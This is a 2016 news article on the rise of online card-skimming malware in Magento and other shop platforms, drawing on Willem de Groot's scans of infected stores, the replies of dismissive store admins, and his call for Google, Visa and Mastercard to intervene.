14 DAY TRIAL // In spite of the fact that WordPress continues to be the most hacked CMS platform, compromising online shopping platforms such as Magento, OpenCart, and others is by far more lucrative for online crooks.
According to Willem de Groot, security analyst for Byte.nl, the number of online shops infected with malware has skyrocketed in the past year, as crooks found that online skimming presents a greater target and more anonymity than real-world ATM skimming.
The recent surge in online skimming has fueled a growth in carding sites, which now often sell payment card data stolen via compromised online store payment pages and PoS malware, rather than data acquired from ATM skimmers.
Online skimming has gone up 69% in 10 months
De Groot, who is also one of the people behind MageReport.com, a Magento site security scanner, has been keeping track of online stores infected with malware ever since November 2015, when he first saw an uptick in such cases.
A general Internet scan of 255,000 online stores has revealed the presence of various malware variants on 3,501 shops.
When he repeated the scan in March 2016, he found 4,476 infected stores, which represented an increase of 28 percent. Ten months later, in September 2016, de Groot found 5,925 infected sites, up 69 percent from November 2015.
With the recent discovery of the MageCart malware, de Groot repeated his scan once again, on October 10, when he found 5,911 infected stores. The good news is that the MageCart report scared enough webmasters, and on October 12, the number had gone down to 5,761, with 334 admins cleaning up their stores, while 170 new stores were infected.
Some high-profile sites are infected
You might be tempted to think that only old and niche websites suffer such infections. It's not true. De Groot highlights some pretty high-profile sites on his most recent infection lists.
He mentions the online store of Icelandic singer Bjork, the store of Audi South Africa, and the website of the NRSC (National Republican Senatorial Committee).
@camcubed @Complex360 90% of the card collection servers I found are hosted on Russian networks. https://t.co/eejKpWAz56 — WillemⓂ️ (@gwillem) October 13, 2016
Some webmasters don't understand the problem, or just don't care
Cleaning up these stores is not a simple job, since updating some online platforms such as Magento requires some level of technical skills, and it's not a one-click button job.
But de Groot doesn't have a problem with the technical side of updating online stores, since all online platforms provide very good documentation to get this done. His problem is with the human factor. Here are some of the replies he received from store admins whom he notified:
“ We don’t care, our payments are handled by a 3rd party payment provider ”
“ Thanks for your suggestion, but our shop is totally safe. There is just an annoying javascript error. ”
“ Our shop is safe because we use https ”
Online skimming malware is now more complex
And if the ignorance of online store owners weren't enough, de Groot, who's been keeping track of different malware families, says he's seen a rise in sophistication for the malware's code.
He mentions that in its first variations, the malware - usually a JavaScript file secretly loaded on the online store - would wait until the user would access a page with the "checkout" term in the URL. Nowadays, malware has support for various types of checkout and payment extensions and uses very complex code obfuscation.
Besides getting harder to detect, the number of online skimming malware has gone through the roof as well. De Groot says that in almost a year, online skimming malware has gone from one single threat to nine varieties and three distinct malware families.
Google, Visa, and Mastercard should intervene
"Companies such as Visa or Mastercard could revoke the payment license of sloppy merchants," de Groot proposes. "But it would be way more efficient if Google would add the compromised sites to its Chrome Safe Browsing blacklist. Visitors would be greeted with a fat red warning screen and induce the store owner to quickly resolve the situation."
De Groot says that he's been sending the Safe Browsing team reports about his findings, but currently only a handful of these sites are blacklisted.
Below is de Groot uncovering a malware infection on the National Republican Senatorial Committee online store.